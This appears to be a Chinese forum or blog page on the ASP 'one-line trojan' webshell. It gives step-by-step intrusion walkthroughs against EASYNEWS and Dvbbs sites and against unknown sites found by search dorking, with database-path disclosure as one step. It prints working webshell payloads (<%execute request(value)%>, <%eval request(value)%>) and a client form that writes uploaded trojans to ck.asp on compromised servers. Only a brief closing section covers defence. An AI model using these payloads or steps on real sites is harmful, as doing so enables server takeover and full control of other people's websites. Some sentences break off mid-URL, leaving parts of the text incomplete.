×

一句话木马

什么是一句话木马?我想知道一句话木马的简易使用方法~!

admin admin 发表于2022-05-09 06:03:58 浏览142 评论0

抢沙发发表评论

什么是一句话木马

一句话木马的使用实例一:“一句话木马”入侵“EASYNEWS新闻管理系统” “EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 Step1 搜索入侵目标 使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。 Step2 检测入侵条件 在这里,我们以网站“ Step3 在数据库中插入ASP后门 前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码: 在浏览器中访问“ Step4 连接后门上传Webshell 由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。 Step5 打开WEBSHELL 上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“ 在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。实例二 “社区超市”入侵动网论坛 Step1 检测入侵条件 以入侵论坛“ Step2 在数据库中插入ASP后门 登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“ 后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“ 实例三 “一句话木马”入侵未知网站 从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。 Step1 暴库得到数据库路径 以“因此数据库文件的实际WEB地址为“Step2 注册网站,插入“一句话木马” 由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。 在网页上点击注册网站按钮,打开注册链接“ 最后只需要用蓝屏木马连接数据库文件“ “一句话木马”的防范 要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。 其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和“等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。 只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。

我想知道一句话木马的简易使用方法~!

蓝屏大叔一句话木马共用两个文件,蓝屏大叔一句话木马服务端和连接端(蓝屏大叔一句话服务端.asp/蓝屏大叔连接端.htm)简单的介绍一下链接方法,这是链接端的内容:《form action=《textarea name=value cols=120 rows=10 width=45》 set lP=server.createObject(“Adodb.Stream“) lP.Open lP.Type=2 lP.CharSet=“gb2312“ lP.writetext request(“fhod“) lP.SaveToFile server.mappath(“ck.asp“),2 lP.Close set lP=nothing response.redirect “ck.asp“ 《/textarea》 《textarea name=fhod cols=120 rows=10 width=45》添入生成木马的内容《/textarea》《BR》《center》《br》 《input type=submit value=提交》这是服务端即上传到肉鸡上的木马内容:《%execute request(“value“)%》就这一句话给大家看下效果,首先将“蓝屏大叔一句话服务端.asp“上传到肉鸡,如下图.我改了名为“daishu.asp“然后打开“蓝屏大叔连接端.htm“源文件(打开方法“右键单击“蓝屏大叔连接端.htm“选择用记事本打开“如下图,把“的木马网址“这上段内容改成你的服务端地址即可保存退出,打开“蓝屏大叔连接端.htm“,在“添入生成木马的内容“文本框中输入你的木马内容即可,比如这里把“站长助手“上传上去,只要把“站长助手的源文件复制到这里面即可,点上传,看下图效果:站长助手源代码复制到这里效果上传的默认文件名为“ck.asp“输入密码就可以进入了

一句话木马是什么

  《%execute request(value)%  《%eval request(value)%(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)  当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道《%eval request(value)%这个文件被插入到哪一个ASP文件里面就可以了。)  这就被称为一句话木马,它是基于B/S结构的。  使用方法